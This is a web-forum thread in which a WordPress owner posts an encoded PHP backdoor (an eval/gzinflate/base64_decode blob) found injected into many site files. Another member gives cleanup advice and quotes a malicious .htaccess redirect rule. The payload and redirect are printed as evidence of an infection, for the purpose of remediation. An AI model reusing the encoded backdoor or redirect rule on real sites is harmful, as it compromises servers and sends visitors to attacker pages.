Code attack

[iRob]

I'm having problem in wp.I don't know how it came or someone injected the code.It seems like this:

<?php eval(gzinflate(base64_decode('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')));?>

I found this code in many files of my wp like index.php , wp-config.php,wp-setting.php, In my theme header,footer,function.php & in other places.
Because of this my site is not functioning well & can't access my wp dashboard.
Before I can use my dashboard I have to delete that code.But this code re-appearing again & again.

Can anyone help me what should I do?

 

[Raptile]

First and foremost, do you have a backup of your Wordpress files before this occurred?

 

[iRob]

I don't have backup.

 

[msk19994]

did u install some new module if yes delete it

 

[iRob]

I haven't installed anything

 

[Raptile]

Needles to be said, you got hacked.

Depending on your circumstances you may want to disable eval, base64_decode and gzinflate.

You can do this in php.ini by looking for the line

 disable_functions =

and set it to

 disable_functions = eval, base64_decode, gzinflate

You will need to restart your web server for the changes to take effect.

Don't you ever, ever, leave your website without a backup!

 

[iRob]

Thanks Raptile.
But where can I find php.ini & how to restart web server?

 

[Raptile]

Are you on Shared Web Hosting or a VPS/Dedicated Hosting?

If on Shared Hosting, you would need to log on to your cPanel which has been provided by your hosting provider and search for php.ini

If that's not the case and you are on a VPS/Dedi, you will need to log on through SHH which has also been provided by your hosting provider and navigate to the etc folder, and you should fine and edit the php.ini File according to the above suggestion.
Otherwise, it should be around /etc/php.ini

 

[iRob]

I was on vps when it happened but after this I transferred to shared as I don't had cpanel access in vps.
I searched but it says no records found.

 

[Raptile]

My bad, unless you have a dedicated or virtual server, you are not allowed to edit system-wide PHP settings.

You should perhaps contact you hosting provider and ask them to change the php.ini settings for you.
Good luck.

 

[iRob]

OK thanks.I contacted my host.I hope they'll help me & this problem will be solved.
BTW if I had backup before what would had been the process? I remembered I had full backup of my site but its very old one.

 

[Raptile]

In your case, I don't see a backup helping that much, as there is most likely another backdoor added to your website, which would result into you most likely getting that infection again.
Your computer has most likely been hacked, if not, your hosting provider has been hacked.

If you have access to your FTP log files, you will see some entries like this:

    Sat Jun 13 21:41:48 2013 0 XX.XX.XX.XX 2848 /home/(name of your account)/public_html/default.php b _ i r ftpaccount ftp 1 * c

The FTP shown in the log entry will be the one that has been used by the hackers to upload the default.php files to your site. Whoever is using that account legitimately could be the using the computer with a virus on it that has stolen the passwords.

The default.php files are also used to upload malicious .htaccess files. The .httaccess File can be found at your root folder.
Those files will have something like this:

[I]RewriteEngine On

    RewriteBase /

    RewriteCond %{HTTP_REFERER} ^http: //[w.]*([^/]+)

    RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]

    RewriteRule ^.*$ http: //le-guide-thalasso-sainte-maxime. com/wapn.html?h=1415319 [L,R][/I]

On the last line, the format is basically the same:

[I]URL/randomname.html?h=(some numbers)[/I]

Next, reviewing the log files will show you where on your site the files were uploaded and then you can delete those files. Check your .htaccess files for any code similar to the above. If there was already a .htaccess file in that folder, they have added their malicious redirects. The above lines can simply be removed from your file.

If there wasn’t already a .htaccess file there then the hackers have added one and it can just be deleted.

With this infection there are typically additional backdoor shell scripts added to the site as well. Those have generally been something using the base64_decode string so you can search your files for that and then further analyze the file to determine if it’s malicious or not.

First protection measures to be taken immediately:

Backup your Hacked website: This way, you can investigate further on how your site was attacked when you have the time.
If you don't know how, login to your cPanel, do a Full Backup from the cPanel menu.

Proceed with changing all your passwords: hosting accounts, FTP, Wordpress password, DO NOT log in to your website until you make sure you have an absolutely clean computer, get an Antivirus, do a Full Scan, Get a Anti-Malware Software (I'd suggest MalwareBytes), do a Full Scan.
Proceed by deleting everything found, if there isn't anything found, then your hosting provider got hacked.

You need to make certain that your passwords are strong and follow these guidelines:

[I]At least 9 characters
    Uses a combination of upper and lower case letters
    Includes numbers
    Has at least 3 special characters (!@#$%^&*()_+|}{“:?>< ,./';[]\=-)
    Is unique to you (don’t use the same password on multiple accounts)[/I]

If you have partner(s) - Don’t give anyone the new password until they’ve run a full virus scan on their computers too.

Then remove the default.php files and scan for any other files with base64_decode in them and review them carefully to determine if they are actually hacker backdoor shells.

Get back to us once you have fully checked your computer and contacted your hosting provider asking them whether they might have gotten hacked or if other websites they host may have reported the same issue.

As I noticed, you seem to be a novice at this, so I hope you found my instructions and explanations easy to be conducted.
Good luck.

 

[JoomlaZ]

^ whoa people like u make this forum worthy

 

[iRob]

Thanks will report the issue once I check all.
Thank you once again for your kind support.

 

[Raptile]

No problem iRob, like I mentioned above, make sure you proceed with the Virus,Malware,Keyloggers removal procedure, then get back to us with the results of the scan and whether you had an infected machine or not.

 

[iRob]

Ok.My PC is clean.& my host had disabled the functions as you said but now my site is showing blank.Just white page.

 

[Raptile]

Dear iRob.

It's safe to say you are on the safe side now, disabeling those function seems to not have affected much, please ask your host to enable them again and see if your website works, once done get back to us, and I shall provide further instructions.

 

[iRob]

Functions been enabled but site is still blank now.

 

[Raptile]

Why would the site be blank? Did you touch anything else other than those functions on the php.ini?
Do you have the backup I told you to do?

 

[iRob]

Yeah I have made full back up from today.I don't have access to php.ini, my host did that.Actually I had deleted same code starting base64_decod in public_html/wp-content/themes/bizom/functions.php
at the end.